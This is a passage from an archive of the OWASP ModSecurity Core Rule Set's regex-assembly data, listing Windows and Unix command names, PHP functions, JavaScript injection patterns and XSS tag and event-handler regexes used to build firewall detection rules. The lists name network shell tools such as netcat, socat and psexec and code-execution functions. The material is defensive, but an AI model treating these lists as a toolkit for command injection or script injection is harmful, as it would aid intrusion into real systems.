to a regexp that can be pasted into the rule: # cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some FP for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). Example: # # diff@ odbcad32 odbcconf openfiles path@ pathping perfmon perl perl5 perlsh php php5 php7 ping pkgmgr popd portqry powercfg powershell powershell_ise print@ printbrm prncnfg prnmngr prompt psexec psfile psgetsid psinfo pskill pslist psloggedon psloglist pspasswd psping psservice psshutdown pssuspend pushd python python2 python3 python3m qgrep qprocess query@ qwinsta rar@ rasdial rasphone rd@ recdisc recover reg@ regedit regini regsvr32 rekeywiz ren@ rename@ replace@ reset@ rm@ rmdir@ rmtshare robocopy route@ rstrui rsync ruby1 ruby18 ruby19 ruby20 ruby21 ruby22 runas rundll32 schtasks sclist secpol select set@ setlocal setx@ sfc share shellrunas shift shortcut showgrps showmbrs shrpubw shutdown sigverif sleep slmgr sort start@ subinacl subst svn sysdm syskey systeminfo systempropertiesadvanced systempropertiesdataexecutionprevention systempropertieshardware systempropertiesperformance takeown taskkill tasklist taskmgr taskschd telnet timeout tlist tpminit tracert tree tsdiscon tsshutdn type@ typeperf unrar unzip useraccountcontrolsettings usrstat verify vol@ waitfor wevtutil wget #disabled for FP: where@ whoami windiff winmsdp winrm winrs winvar wmic wmimgmt wscript wscui wuapp wuauclt wusa xcacls xcopy zip@ 
������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932130.data���������������������������������������0000664�0000000�0000000�00000000057�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\$\(.*\) \$\{.*\} <\(.*\) >\(.*\) \$\(\(.*\)\) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932140.data���������������������������������������0000664�0000000�0000000�00000000266�14461225151�0023610�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\bfor(?:/[dflr].*)? 
%+[^ ]+ in\(.*\)\s?do \bif(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==)) ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932150.txt����������������������������������������0000664�0000000�0000000�00000003125�14461225151�0023514�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932150 (RCE Unix command injection) # To lower FP, this rule requires whitespace after a command. # # To convert to a regexp that can be pasted into the rule: # cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. 
# bash bsdcat bsdiff bsdtar builtin bzcat bzdiff bzegrep bzfgrep bzgrep bzless bzmore cc command coproc csh curl dash diff dmesg doas echo egrep env eval exec fetch fgrep filetest ftpstats ftpwho gcc GET grep gzcat gzip head hup irb irb1 irb18 irb19 irb20 irb21 irb22 java jobs -x lastcomm lastlog lastlogin lessecho lessfile lesspipe lftp lftpget ls ls-F lsb_release lscpu lsmod lsof lspci lsusb lwp lwp-download lynx lzcat lzcmp lzdiff lzegrep lzfgrep lzgrep lzless lzma lzmore mailq mlocate mysqladmin mysqldump mysqldumpslow mysqlhotcopy mysqlshow nc nc.openbsd nc.traditional ncat netcat netkit-ftp netstat nohup nping nstat onintr perl perl5 pftp pgrep php php5 php7 ping pkexec pkill popd printenv ptar ptardiff ptargrep python python2 python3 python3m rcp realpath rename repeat replace rmdir rmuser rnano rsync ruby ruby1 ruby18 ruby19 ruby20 ruby21 ruby22 sched scp sdiff sed sendmail setenv setsid sftp sh sh.distrib socat source ssh strings sudo svn sysctl tail tailf tar tcping tcptraceroute tcsh telnet time timeout traceroute traceroute6 uname uncompress unlzma unrar unset unxz unzip useradd userdel usermod vigr vipw w3m wget whoami xargs xz xzcat xzcmp xzdec xzdiff xzegrep xzfgrep xzgrep xzless xzmore zcat zcmp zdiff zegrep zfgrep zgrep zip zless zmore zrun zsh 
�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-933131.data���������������������������������������0000664�0000000�0000000�00000000362�14461225151�0023606�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������AUTH_TYPE HTTP_ACCEPT HTTP_ACCEPT_CHARSET HTTP_ACCEPT_ENCODING HTTP_ACCEPT_LANGUAGE HTTP_CONNECTION HTTP_HOST HTTP_KEEP_ALIVE HTTP_REFERER HTTP_USER_AGENT HTTP_X_FORWARDED_FOR ORIG_PATH_INFO PATH_INFO PATH_TRANSLATED QUERY_STRING REQUEST_URI ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-933160.data���������������������������������������0000664�0000000�0000000�00000005727�14461225151�0023622�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������array_diff_uassoc array_diff_ukey 
array_filter array_intersect_uassoc array_intersect_ukey array_map array_reduce array_udiff array_udiff_assoc array_udiff_uassoc array_uintersect array_uintersect_assoc array_uintersect_uassoc assert assert_options base64_encode bson_decode bson_encode bzopen chr convert_uuencode create_function curl_exec curl_file_create curl_init debug_backtrace error_reporting escapeshellarg escapeshellcmd eval exec exif_imagetype exif_read_data exif_tagname exif_thumbnail file file_exists fileatime filectime filegroup fileinode filemtime fileperms finfo_open fopen fputs ftp_connect ftp_get ftp_nb_get ftp_nb_put ftp_put function_exists fwrite get_cfg_var get_current_user get_meta_tags getcwd getenv getimagesize getlastmod getmygid getmyinode getmypid getmyuid glob gzcompress gzdeflate gzencode gzfile gzopen gzread gzwrite hash_file hash_hmac_file hash_update_file header_register_callback hex2bin highlight_file html_entity_decode htmlentities htmlspecialchars htmlspecialchars_decode image2wbmp imagecreatefromgif imagecreatefromjpeg imagecreatefrompng imagecreatefromwbmp imagecreatefromxbm imagecreatefromxpm imagegd imagegd2 imagegif imagejpeg imagepng imagewbmp imagexbm ini_get ini_get_all ini_set iptcembed is_dir is_executable is_file is_readable is_writable is_writeable iterator_apply json_decode json_encode mb_ereg mb_ereg_match mb_ereg_replace mb_ereg_replace_callback mb_eregi mb_eregi_replace mb_parse_str md5_file method_exists mkdir move_uploaded_file mysql_query ob_clean ob_end_clean ob_end_flush ob_flush ob_get_clean ob_get_contents ob_get_flush ob_start odbc_connect odbc_exec odbc_execute odbc_result odbc_result_all opendir parse_ini_file parse_str passthru pg_connect pg_execute pg_prepare pg_query php_strip_whitespace php_uname phpinfo phpversion popen posix_getegid posix_geteuid posix_getgid posix_getlogin posix_getpwnam posix_kill posix_mkfifo posix_mknod posix_ttyname preg_match preg_match_all preg_replace preg_replace_callback preg_replace_callback_array preg_split 
print_r proc_close proc_get_status proc_nice proc_open proc_terminate putenv rawurldecode rawurlencode read_exif_data readdir readfile readgzfile register_shutdown_function register_tick_function rename_function runkit_constant_add runkit_constant_redefine runkit_function_add runkit_function_copy runkit_function_redefine runkit_function_rename runkit_method_add runkit_method_copy runkit_method_redefine runkit_method_rename session_set_save_handler session_start set_error_handler set_exception_handler set_include_path set_magic_quotes_runtime setdefaultstub sha1_file show_source simplexml_load_file simplexml_load_string socket_connect socket_create spl_autoload_register sqlite_array_query sqlite_create_aggregate sqlite_create_function sqlite_exec sqlite_open sqlite_popen sqlite_query sqlite_single_query sqlite_unbuffered_query stream_context_create stream_socket_client stripcslashes stripslashes strrev system tmpfile uasort uksort unpack unserialize urldecode urlencode usort var_dump �����������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-933161.data���������������������������������������0000664�0000000�0000000�00000002614�14461225151�0023613�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������abs acos acosh array arsort asin asinh asort assert atan atan2 atanh basename bindec ceil chdir checkdate chmod chop chown chroot closedir closelog compact constant copy cos cosh count crypt current date decoct define defined die dir dirname diskfreespace dl doubleval each easter_date easter_days echo empty end ereg eregi error_log exit exp explode extract fclose feof fgets fileowner filepro filesize filetype floatval flock floor flush fmod 
fread fstat ftell ftok function getdate gettext gettype gmdate hash header headers_list headers_sent hebrev hypot iconv idate implode include intdiv intval invoke is_a is_array is_bool is_callable is_double is_finite is_float is_infinite is_int is_integer is_link is_long is_nan is_null is_numeric is_object is_real is_resource is_scalar is_string isset join key ksort lcfirst levenshtein link linkinfo list localtime log log10 log1p lstat ltrim mail main max mbereg mbsplit metaphone mhash microtime min msql mysql natsort next octdec openlog ord pack pathinfo pclose pi pos pow prev print printf quotemeta rand range readline readlink recode rename require reset rewind round rsort rtrim scandir serialize settype shuffle similar_text sin sinh sizeof sleep sort soundex split spliti sprintf sqrt srand stat strcoll strlen strspn substr symlink syslog taint tan tanh tempnam textdomain time touch trim ucfirst umask uniqid unlink unset untaint usleep usort virtual wordwrap ��������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-934100.txt����������������������������������������0000664�0000000�0000000�00000000230�14461225151�0023503�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������_\$\$ND_FUNC\$\$_ __js_function \beval\s*\( String\s*\.\s*fromCharCode function\s*\(\s*\)\s*{ new\s+Function\s*\( this\.constructor module\.exports\s*= 
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-941130.data���������������������������������������0000664�0000000�0000000�00000000415�14461225151�0023603�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������(?i)[\s\S]xlink:href\b (?i)[\s\S]xhtml\b (?i)[\s\S]xmlns\b (?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM\b (?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC\b (?i)[\s\S]data:text/html\b (?i)[\s\S]formaction\b (?i)[\s\S]@import\b (?i)[\s\S];base64\b (?i)[\s\S]pattern\b.*?=\b ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-941160.data���������������������������������������0000664�0000000�0000000�00000051010�14461225151�0023603�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?c\W*?r\W*?i\W*?p\W*?t 
<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?f\W*?o\W*?r\W*?m <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?t\W*?y\W*?l\W*?e <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?v\W*?g <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?l\W*?i\W*?n\W*?k[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?e\W*?m\W*?b\W*?e\W*?d[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?p\W*?a\W*?r\W*?a\W*?m[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?a\W*?s\W*?e[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?o\W*?d\W*?y[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?e\W*?t\W*?a[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i\W*?m\W*?a?\W*?g\W*?e?[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?v\W*?i\W*?d\W*?e\W*?o[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?u\W*?d\W*?i\W*?o[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?e\W*?t[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w] (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)background[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)formaction[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)lowsrc[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onAppCommand[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMActivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMAttrModified[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMCharacterDataModified[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusIn[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusOut[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMMouseScroll[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInsertedIntoDocument[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInserted[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemovedFromDocument[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemoved[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMSubtreeModified[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onLoad[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAfterPaint[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAudioAvailable[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozBeforeResize[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICanceled[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICompleted[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUIStarted[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureStart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureUpdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMouseHittest[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMousePixelScroll[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozPressTapGesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureStart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureUpdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozScrolledAreaChanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureEnd[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureStart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureUpdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGesture[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozTapGesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onRequest[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGAbort[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGError[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGLoad[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGResize[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGScroll[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGUnload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGZoom[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onabort[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onactivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onadapteradded[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaddtrack[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterprint[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterscriptexecute[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onalerting[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationiteration[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onantennastatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioprocess[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudiostart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeactivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforedeactivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecopy[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecut[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeeditfocus[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforepaste[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeprint[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforescriptexecute[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeunload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeginEvent[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbegin[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblocked[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblur[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbounce[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onboundary[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbroadcast[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbusy[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncached[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncallschanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplay[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplaythrough[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncardstatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncellchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncfstatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingtimechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchecking[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclick[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclose[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommand[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommandupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncomplete[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnected[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnecting[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontextmenu[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontrolselect[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncopy[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncuechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncut[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataavailable[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatachange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetchanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetcomplete[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondblclick[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeactivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliveryerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliverysuccess[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicefound[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicelight[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicemotion[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceorientation[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceproximity[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondialing[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisabled[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondischargingtimechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnected[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnecting[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondownloading[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragdrop[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragenter[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragexit[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondraggesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragleave[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragover[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondrop[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondurationchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onemptied[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenabled[\s\x08]*?= 